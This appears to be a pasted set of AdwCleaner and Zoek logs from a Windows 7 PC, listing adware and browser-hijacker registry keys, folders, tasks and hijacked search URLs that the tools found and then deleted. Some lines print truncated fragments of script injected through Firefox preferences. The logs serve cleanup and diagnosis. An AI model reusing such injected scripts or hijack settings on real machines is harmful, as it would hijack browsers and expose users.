Key Found : HKLM\SOFTWARE\Classes\Funa2Save.Funa2Save
Key Found : HKLM\SOFTWARE\Classes\Funa2Save.Funa2Save.4.5
Key Found : HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
Key Found : HKLM\SOFTWARE\Classes\Interface\{C66F0B7A-BD67-4982-AF71-C6CA6E7F016F}
Key Found : HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Found : HKLM\SOFTWARE\Classes\ShhopDrope.ShhopDrope
Key Found : HKLM\SOFTWARE\Classes\ShhopDrope.ShhopDrope.4.7
Key Found : HKLM\SOFTWARE\Classes\speedupmypc
Key Found : HKLM\SOFTWARE\Classes\tpErfEEctcoupon.tpErfEEctcoupon
Key Found : HKLM\SOFTWARE\Classes\tpErfEEctcoupon.tpErfEEctcoupon.1.3
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
Key Found : HKLM\SOFTWARE\GlobalUpdate
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{21BE4A39-F3B8-3881-C165-D5BE1940B6B7}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{2DA20882-8FB0-D5E8-5011-211AB37CDD60}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{310E5046-DDEA-D525-42B1-DA9430AD2C95}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{3ABEFC4D-4491-1AC7-104D-00E2082F944C}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{59C3F0EF-049A-7029-B7D7-8F8521875358}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{5F67A827-B751-FAFB-64EE-A591954230F3}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{B911B39E-2966-E45D-A3F7-6770B23FFF1E}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{C575E9F8-8CCE-8ADA-F592-97D27D617CF5}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{DCC2D8A0-C2D2-D985-8F2E-77B4D5E94961}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}_is1
Key Found : HKLM\SOFTWARE\PerformerSoft
Key Found : HKLM\SOFTWARE\SupDp
Key Found : HKLM\SOFTWARE\SweetIM
Key Found : HKLM\SOFTWARE\sweet-pageSoftware
Key Found : HKLM\SOFTWARE\Uniblue
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{21BE4A39-F3B8-3881-C165-D5BE1940B6B7}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{2DA20882-8FB0-D5E8-5011-211AB37CDD60}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{310E5046-DDEA-D525-42B1-DA9430AD2C95}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{3ABEFC4D-4491-1AC7-104D-00E2082F944C}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{59C3F0EF-049A-7029-B7D7-8F8521875358}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{5F67A827-B751-FAFB-64EE-A591954230F3}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{B911B39E-2966-E45D-A3F7-6770B23FFF1E}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{C575E9F8-8CCE-8ADA-F592-97D27D617CF5}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{DCC2D8A0-C2D2-D985-8F2E-77B4D5E94961}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{C66F0B7A-BD67-4982-AF71-C6CA6E7F016F}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3152E1F19977892449DC968802CE8964
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\649A52D257CA5DB4EAAE8BA9EB23E467
 
***** [ Browsers ] *****
 
-\\ Internet Explorer v11.0.9600.17344
 
 
-\\ Mozilla Firefox v28.0 (en-US)
 
[ow597pnn.default] - Line Found : user_pref("extensions.nWpQCpk6wsS.scode", "(function(){try{var url=window.self.location.href;if(url.indexOf(\"acebook\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf([...]
[ow597pnn.default] - Line Found : user_pref("extensions.ocqQ4lEIHr3.scode", "(function(){try{var url=window.self.location.href;if(url.indexOf(\"acebook\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf([...]
 
-\\ Google Chrome v33.0.1750.117
 
 
*************************
 
AdwCleaner[R0].txt - [10793 octets] - [01/01/2014 16:28:13]
AdwCleaner[R1].txt - [8413 octets] - [16/10/2014 14:04:51]
AdwCleaner[S0].txt - [8455 octets] - [01/01/2014 16:31:10]
 
########## EOF - C:\AdwCleaner\AdwCleaner[R1].txt - [8533 octets] ##########
 
 
- AdwCleaner[R0]
 
# AdwCleaner v3.016 - Report created 01/01/2014 at 16:28:13
# Updated 23/12/2013 by Xplode
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Mitey Fresh - KIRRA-PC
# Running from : C:\Users\Mitey Fresh\Downloads\adwcleaner.exe
# Option : Scan
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
File Found : C:\END
File Found : C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\searchplugins\Web Search.xml
File Found : C:\Windows\System32\Tasks\NCH Software
File Found : C:\Windows\System32\Tasks\UpdaterEX
File Found : C:\Windows\Tasks\UpdaterEX.job
Folder Found : C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\Extensions\staged
Folder Found : C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\Extensions\staged
Folder Found : C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\Extensions\staged
Folder Found C:\Program Files (x86)\DiggiCOupOn
Folder Found C:\Program Files (x86)\Nation Toolbar
Folder Found C:\Program Files (x86)\NCH Software
Folder Found C:\Program Files (x86)\WebSearch
Folder Found C:\ProgramData\Babylon
Folder Found C:\ProgramData\DiggiCOupOn
Folder Found C:\ProgramData\Dowunnloadd keePer
Folder Found C:\ProgramData\NCH Software
Folder Found C:\ProgramData\SearchNewTab
Folder Found C:\Users\Mitey Fresh\AppData\Roaming\NCH Software
Folder Found C:\Users\Mitey Fresh\AppData\Roaming\UpdaterEX
Folder Found C:\Users\MITEYF~1\AppData\Local\Temp\eIntaller
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
Data Found : [x64] HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] - C:\PROGRA~3\BROWSE~1\BROWSE~2.DLL
Key Found : HKCU\Software\AppDataLow\Software\Crossrider
Key Found : HKCU\Software\AppDataLow\SProtector
Key Found : HKCU\Software\BabSolution
Key Found : HKCU\Software\DataMngr
Key Found : HKCU\Software\DataMngr_Toolbar
Key Found : HKCU\Software\InstallCore
Key Found : HKCU\Software\InstalledThirdPartyPrograms
Key Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{006EE092-9658-4FD6-BD8E-A21A348E59F5}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\UpdaterEX
Key Found : HKCU\Software\Nation Toolbar
Key Found : HKCU\Software\NCH Software
Key Found : HKCU\Software\SmartBar
Key Found : HKCU\Software\UpdaterEX
Key Found : [x64] HKCU\Software\BabSolution
Key Found : [x64] HKCU\Software\DataMngr
Key Found : [x64] HKCU\Software\DataMngr_Toolbar
Key Found : [x64] HKCU\Software\InstallCore
Key Found : [x64] HKCU\Software\InstalledThirdPartyPrograms
Key Found : [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{006EE092-9658-4FD6-BD8E-A21A348E59F5}
Key Found : [x64] HKCU\Software\Nation Toolbar
Key Found : [x64] HKCU\Software\NCH Software
Key Found : [x64] HKCU\Software\SmartBar
Key Found : [x64] HKCU\Software\UpdaterEX
Key Found : HKLM\Software\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Found : HKLM\SOFTWARE\808a8abd34eb15
Key Found : HKLM\SOFTWARE\Classes\AppID\{0A18A436-2A7A-49F3-A488-30538A2F6323}
Key Found : HKLM\SOFTWARE\Classes\AppID\{4277F7CF-0000-46CF-BA49-D624465C4BAB}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{007EFBDF-8A5D-4930-97CC-A4B437CBA777}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{AE07101B-46D4-4A98-AF68-0333EA26E113}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}
Key Found : HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
Key Found : HKLM\SOFTWARE\Classes\Interface\{C66F0B7A-BD67-4982-AF71-C6CA6E7F016F}
Key Found : HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Found : HKLM\SOFTWARE\Classes\Prod.cap
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
Key Found : HKLM\Software\DataMngr
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{006EE092-9658-4FD6-BD8E-A21A348E59F5}
Key Found : HKLM\SOFTWARE\Microsoft\Tracing\SnapDo_RASAPI32
Key Found : HKLM\SOFTWARE\Microsoft\Tracing\SnapDo_RASMANCS
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C670DCAE-E392-AA32-6F42-143C7FC4BDFD}
Key Found : HKLM\Software\Nation Toolbar
Key Found : HKLM\Software\NCH Software
Key Found : HKLM\Software\SP Global
Key Found : HKLM\Software\SProtector
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{AE07101B-46D4-4A98-AF68-0333EA26E113}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{C66F0B7A-BD67-4982-AF71-C6CA6E7F016F}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Found : [x64] HKLM\SOFTWARE\InstalledThirdPartyPrograms
 
***** [ Browsers ] *****
 
-\\ Internet Explorer v11.0.9600.16428
 
Setting Found : HKCU\Software\Microsoft\Internet Explorer\Main [Search Page] - hxxp://feed.snapdo.com/?publisher=SnapdoGOblidooYB&dpid=GOB1&co=AU&userid=9cf44940-af9e-4ad7-a0b7-6613cc3276d1&searchtype=ds&q={searchTerms}&installDate=28/10/2013
Setting Found : HKCU\Software\Microsoft\Internet Explorer\Main [Start Page] - hxxp://feed.snapdo.com/?publisher=SnapdoGOblidooYB&dpid=GOB1&co=AU&userid=9cf44940-af9e-4ad7-a0b7-6613cc3276d1&searchtype=hp&installDate=28/10/2013
Setting Found : HKCU\Software\Microsoft\Internet Explorer\Main [Search Bar] - hxxp://feed.snapdo.com/?publisher=SnapdoGOblidooYB&dpid=GOB1&co=AU&userid=9cf44940-af9e-4ad7-a0b7-6613cc3276d1&searchtype=ds&q={searchTerms}&installDate=28/10/2013
Setting Found : HKCU\Software\Microsoft\Internet Explorer\Main [Default_Page_URL] - hxxp://www.qvo6.com/?utm_source=b&utm_medium=cor&utm_campaign=eXQ&utm_content=hp&from=cor&uid=WDCXWD5000BEVT-22A0RT0_WD-WXF1A80P6304P6304&ts=1380937348
Setting Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Page_URL] - hxxp://www.qvo6.com/?utm_source=b&utm_medium=cor&utm_campaign=eXQ&utm_content=hp&from=cor&uid=WDCXWD5000BEVT-22A0RT0_WD-WXF1A80P6304P6304&ts=1380937348
Setting Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page] - hxxp://websearch.relevantsearch.info/?pid=356&r=2013/10/13&hid=10333777505416917158&lg=EN&cc=AU&unqvl=38
Setting Found : HKCU\Software\Microsoft\Internet Explorer\Search [Default_Search_URL] - hxxp://feed.snapdo.com/?publisher=SnapdoGOblidooYB&dpid=GOB1&co=AU&userid=9cf44940-af9e-4ad7-a0b7-6613cc3276d1&searchtype=ds&q={searchTerms}&installDate=28/10/2013
Setting Found : HKCU\Software\Microsoft\Internet Explorer\Search [SearchAssistant] - hxxp://feed.snapdo.com/?publisher=SnapdoGOblidooYB&dpid=GOB1&co=AU&userid=9cf44940-af9e-4ad7-a0b7-6613cc3276d1&searchtype=ds&q={searchTerms}&installDate=28/10/2013
Setting Found : HKCU\Software\Microsoft\Internet Explorer\SearchUrl [Default] - hxxp://feed.snapdo.com/?publisher=SnapdoGOblidooYB&dpid=GOB1&co=AU&userid=9cf44940-af9e-4ad7-a0b7-6613cc3276d1&searchtype=ds&q={searchTerms}&installDate=28/10/2013
Setting Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchUrl [Default] - hxxp://feed.snapdo.com/?publisher=SnapdoGOblidooYB&dpid=GOB1&co=AU&userid=9cf44940-af9e-4ad7-a0b7-6613cc3276d1&searchtype=ds&q={searchTerms}&installDate=28/10/2013
Setting Found : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Page_URL] - hxxp://www.qvo6.com/?utm_source=b&utm_medium=cor&utm_campaign=eXQ&utm_content=hp&from=cor&uid=WDCXWD5000BEVT-22A0RT0_WD-WXF1A80P6304P6304&ts=1380937348
Setting Found : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page] - hxxp://www.qvo6.com/?utm_source=b&utm_medium=cor&utm_campaign=eXQ&utm_content=hp&from=cor&uid=WDCXWD5000BEVT-22A0RT0_WD-WXF1A80P6304P6304&ts=1380937348
 
-\\ Mozilla Firefox v24.0 (en-US)
 
[ File : C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\prefs.js ]
 
Line Found : user_pref("aol_toolbar.default.homepage.check", false);
Line Found : user_pref("aol_toolbar.default.search.check", false);
Line Found : user_pref("browser.search.defaultenginename", "WebSearch");
Line Found : user_pref("browser.search.defaultenginename,S", "WebSearch");
Line Found : user_pref("browser.search.defaulturl", "hxxp://websearch.relevantsearch.info/?pid=356&r=2013/10/13&hid=10333777505416917158&lg=EN&cc=AU&unqvl=38&l=1&q=");
Line Found : user_pref("browser.search.order.1", "WebSearch");
Line Found : user_pref("browser.search.order.1,S", "WebSearch");
Line Found : user_pref("browser.search.selectedEngine,S", "WebSearch");
Line Found : user_pref("extensions.4lDN.scode", "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};if(window.self.location.hostname.indexOf('mail.')==-1)\r\n{try{for(i=0;i<5;i++){win[...]
Line Found : user_pref("extensions.7IQJR.scode", "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};if(window.self==window.top){var script=document.createElement(\"script\");script.t[...]
Line Found : user_pref("extensions.BabylonToolbar.prtkDS", 0);
Line Found : user_pref("extensions.BabylonToolbar.prtkHmpg", 0);
Line Found : user_pref("sweetim.toolbar.previous.browser.search.defaultenginename", "");
Line Found : user_pref("sweetim.toolbar.previous.browser.search.selectedEngine", "");
Line Found : user_pref("sweetim.toolbar.previous.browser.startup.homepage", "");
Line Found : user_pref("sweetim.toolbar.previous.keyword.URL", "");
Line Found : user_pref("sweetim.toolbar.scripts.1.domain-blacklist", "");
Line Found : user_pref("sweetim.toolbar.searchguard.UserRejectedGuard_DS", "");
Line Found : user_pref("sweetim.toolbar.searchguard.UserRejectedGuard_HP", "");
Line Found : user_pref("sweetim.toolbar.searchguard.enable", "");
Line Found : user_pref("browser.startup.homepage", "hxxp://feed.snapdo.com/?publisher=SnapdoGOblidooYB&dpid=GOB1&co=AU&userid=9cf44940-af9e-4ad7-a0b7-6613cc3276d1&searchtype=hp&installDate=28/10/2013");
Line Found : user_pref("browser.search.selectedEngine", "Web Search");
Line Found : user_pref("keyword.URL", "hxxp://feed.snapdo.com/?publisher=SnapdoGOblidooYB&dpid=GOB1&co=AU&userid=9cf44940-af9e-4ad7-a0b7-6613cc3276d1&searchtype=ds&installDate=28/10/2013&q=");
 
-\\ Google Chrome v31.0.1650.63
 
[ File : C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\preferences ]
 
 
*************************
 
AdwCleaner[R0].txt - [10575 octets] - [01/01/2014 16:28:13]
 
########## EOF - C:\AdwCleaner\AdwCleaner[R0].txt - [10636 octets] ##########
 
 
- AdwCleaner[S0]

# AdwCleaner v3.016 - Report created 01/01/2014 at 16:31:10
# Updated 23/12/2013 by Xplode
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Mitey Fresh - KIRRA-PC
# Running from : C:\Users\Mitey Fresh\Downloads\adwcleaner.exe
# Option : Clean
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
Folder Deleted : C:\ProgramData\Babylon
Folder Deleted : C:\ProgramData\NCH Software
Folder Deleted : C:\ProgramData\DiggiCOupOn
Folder Deleted : C:\ProgramData\Dowunnloadd keePer
Folder Deleted : C:\ProgramData\SearchNewTab
Folder Deleted : C:\Program Files (x86)\Nation Toolbar
Folder Deleted : C:\Program Files (x86)\NCH Software
Folder Deleted : C:\Program Files (x86)\WebSearch
Folder Deleted : C:\Program Files (x86)\DiggiCOupOn
Folder Deleted : C:\Users\MITEYF~1\AppData\Local\Temp\eIntaller
Folder Deleted : C:\Users\Mitey Fresh\AppData\Roaming\NCH Software
Folder Deleted : C:\Users\Mitey Fresh\AppData\Roaming\UpdaterEX
Folder Deleted : C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\Extensions\staged
File Deleted : C:\END
File Deleted : C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\searchplugins\Web Search.xml
File Deleted : C:\Windows\System32\Tasks\NCH Software
File Deleted : C:\Windows\Tasks\UpdaterEX.job
File Deleted : C:\Windows\System32\Tasks\UpdaterEX
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
Key Deleted : HKLM\SOFTWARE\Classes\Prod.cap
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\SnapDo_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\SnapDo_RASMANCS
Key Deleted : HKLM\SOFTWARE\808a8abd34eb15
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{0A18A436-2A7A-49F3-A488-30538A2F6323}
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{4277F7CF-0000-46CF-BA49-D624465C4BAB}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{007EFBDF-8A5D-4930-97CC-A4B437CBA777}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{AE07101B-46D4-4A98-AF68-0333EA26E113}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{C66F0B7A-BD67-4982-AF71-C6CA6E7F016F}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{006EE092-9658-4FD6-BD8E-A21A348E59F5}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{006EE092-9658-4FD6-BD8E-A21A348E59F5}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{AE07101B-46D4-4A98-AF68-0333EA26E113}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{C66F0B7A-BD67-4982-AF71-C6CA6E7F016F}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Deleted : HKCU\Software\BabSolution
Key Deleted : HKCU\Software\DataMngr
[#] Key Deleted : HKCU\Software\DataMngr_Toolbar
Key Deleted : HKCU\Software\InstallCore
Key Deleted : HKCU\Software\InstalledThirdPartyPrograms
Key Deleted : HKCU\Software\Nation Toolbar
Key Deleted : HKCU\Software\NCH Software
Key Deleted : HKCU\Software\SmartBar
Key Deleted : HKCU\Software\UpdaterEX
Key Deleted : HKCU\Software\AppDataLow\SProtector
Key Deleted : HKCU\Software\AppDataLow\Software\Crossrider
Key Deleted : HKLM\Software\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Deleted : HKLM\Software\DataMngr
Key Deleted : HKLM\Software\Nation Toolbar
Key Deleted : HKLM\Software\NCH Software
Key Deleted : HKLM\Software\SP Global
Key Deleted : HKLM\Software\SProtector
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\UpdaterEX
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C670DCAE-E392-AA32-6F42-143C7FC4BDFD}
Key Deleted : [x64] HKLM\SOFTWARE\InstalledThirdPartyPrograms
Data Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] - C:\PROGRA~3\BROWSE~1\BROWSE~2.DLL
 
***** [ Browsers ] *****
 
-\\ Internet Explorer v11.0.9600.16428
 
Setting Restored : HKCU\Software\Microsoft\Internet Explorer\Main [Search Page]
Setting Restored : HKCU\Software\Microsoft\Internet Explorer\Main [Start Page]
Setting Restored : HKCU\Software\Microsoft\Internet Explorer\Main [Search Bar]
Setting Restored : HKCU\Software\Microsoft\Internet Explorer\Main [Default_Page_URL]
Setting Restored : HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Page_URL]
Setting Restored : HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page]
Setting Restored : HKCU\Software\Microsoft\Internet Explorer\Search [Default_Search_URL]
Setting Restored : HKCU\Software\Microsoft\Internet Explorer\Search [SearchAssistant]
Setting Restored : HKCU\Software\Microsoft\Internet Explorer\SearchUrl [Default]
Setting Restored : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchUrl [Default]
Setting Restored : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Page_URL]
Setting Restored : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page]
 
-\\ Mozilla Firefox v24.0 (en-US)
 
[ File : C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\prefs.js ]
 
Line Deleted : user_pref("aol_toolbar.default.homepage.check", false);
Line Deleted : user_pref("aol_toolbar.default.search.check", false);
Line Deleted : user_pref("browser.search.defaultenginename", "WebSearch");
Line Deleted : user_pref("browser.search.defaultenginename,S", "WebSearch");
Line Deleted : user_pref("browser.search.defaulturl", "hxxp://websearch.relevantsearch.info/?pid=356&r=2013/10/13&hid=10333777505416917158&lg=EN&cc=AU&unqvl=38&l=1&q=");
Line Deleted : user_pref("browser.search.order.1", "WebSearch");
Line Deleted : user_pref("browser.search.order.1,S", "WebSearch");
Line Deleted : user_pref("browser.search.selectedEngine,S", "WebSearch");
Line Deleted : user_pref("extensions.4lDN.scode", "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};if(window.self.location.hostname.indexOf('mail.')==-1)\r\n{try{for(i=0;i<5;i++){win[...]
Line Deleted : user_pref("extensions.7IQJR.scode", "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};if(window.self==window.top){var script=document.createElement(\"script\");script.t[...]
Line Deleted : user_pref("extensions.BabylonToolbar.prtkDS", 0);
Line Deleted : user_pref("extensions.BabylonToolbar.prtkHmpg", 0);
Line Deleted : user_pref("sweetim.toolbar.previous.browser.search.defaultenginename", "");
Line Deleted : user_pref("sweetim.toolbar.previous.browser.search.selectedEngine", "");
Line Deleted : user_pref("sweetim.toolbar.previous.browser.startup.homepage", "");
Line Deleted : user_pref("sweetim.toolbar.previous.keyword.URL", "");
Line Deleted : user_pref("sweetim.toolbar.scripts.1.domain-blacklist", "");
Line Deleted : user_pref("sweetim.toolbar.searchguard.UserRejectedGuard_DS", "");
Line Deleted : user_pref("sweetim.toolbar.searchguard.UserRejectedGuard_HP", "");
Line Deleted : user_pref("sweetim.toolbar.searchguard.enable", "");
Line Deleted : user_pref("browser.startup.homepage", "hxxp://feed.snapdo.com/?publisher=SnapdoGOblidooYB&dpid=GOB1&co=AU&userid=9cf44940-af9e-4ad7-a0b7-6613cc3276d1&searchtype=hp&installDate=28/10/2013");
Line Deleted : user_pref("browser.search.selectedEngine", "Web Search");
Line Deleted : user_pref("keyword.URL", "hxxp://feed.snapdo.com/?publisher=SnapdoGOblidooYB&dpid=GOB1&co=AU&userid=9cf44940-af9e-4ad7-a0b7-6613cc3276d1&searchtype=ds&installDate=28/10/2013&q=");
 
-\\ Google Chrome v31.0.1650.63
 
[ File : C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\preferences ]
 
 
*************************
 
AdwCleaner[R0].txt - [10793 octets] - [01/01/2014 16:28:13]
AdwCleaner[S0].txt - [8279 octets] - [01/01/2014 16:31:10]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [8339 octets] ##########
 
 
- Zoek logfile
 
 
Zoek.exe v5.0.0.0 Updated 16-10-2014
Tool run by Mitey Fresh on Thu 16/10/2014 at 14:16:35.51.
Microsoft Windows 7 Home Premium  6.1.7601 Service Pack 1 x64
Running in: Normal Mode Internet Access Detected
Launched: C:\Users\Mitey Fresh\Desktop\zoek.exe [Scan all users] [Script inserted] 
 
==== System Restore Info ======================
 
16/10/2014 2:18:15 PM Zoek.exe System Restore Point Created Succesfully.
 
==== Installed Programs ======================
 
Adobe AIR  
Adobe Flash Player 15 ActiveX  
Adobe Flash Player 15 Plugin  
Adobe Reader XI (11.0.07)  
Adobe Shockwave Player 12.0  
AGEIA PhysX v7.11.13  
AUSkey software 1.4.4  
Browser AdBlocker  
calibre  
Citrix Online Launcher  
Compatibility Pack for the 2007 Office system  
D3DX10  
DAEMON Tools Lite  
ECI Client v6.0  
Fallout 3  
Fallout New Vegas Ultimate Edition  
File Association Helper  
Google Chrome  
Google Drive  
GoToMeeting 6.4.4.1831  
iSkysoft Video Converter Ultimate(Build 5.4.1.0)  
Java 7 Update 17 (64-bit)  
Java 7 Update 65  
Java Auto Updater  
Jing  
LogMeIn Hamachi  
Lost Via Domus  
Microsoft .NET Framework 4.5.1  
Microsoft Application Error Reporting  
Microsoft Corporation  
Microsoft Games for Windows - LIVE Redistributable  
Microsoft Games for Windows Marketplace  
Microsoft LifeCam  
Microsoft Office File Validation Add-In  
Microsoft Office Professional Edition 2003  
Microsoft Security Client  
Microsoft Security Essentials  
Microsoft Silverlight  
Microsoft SQL Server 2005 Compact Edition [ENU]  
Microsoft Visual C++ 2005 Redistributable  
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17  
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161  
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17  
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161  
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.30319  
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319  
MixPad  
Movie Maker  
Mozilla Firefox 28.0 (x86 en-US)  
Mozilla Maintenance Service  
MSVCRT  
MSVCRT110  
MSVCRT110_amd64  
MTA:SA v1.3.5  
OutfoxTV  
Outlook Setup Tool  
PDFCreator  
Photo Common  
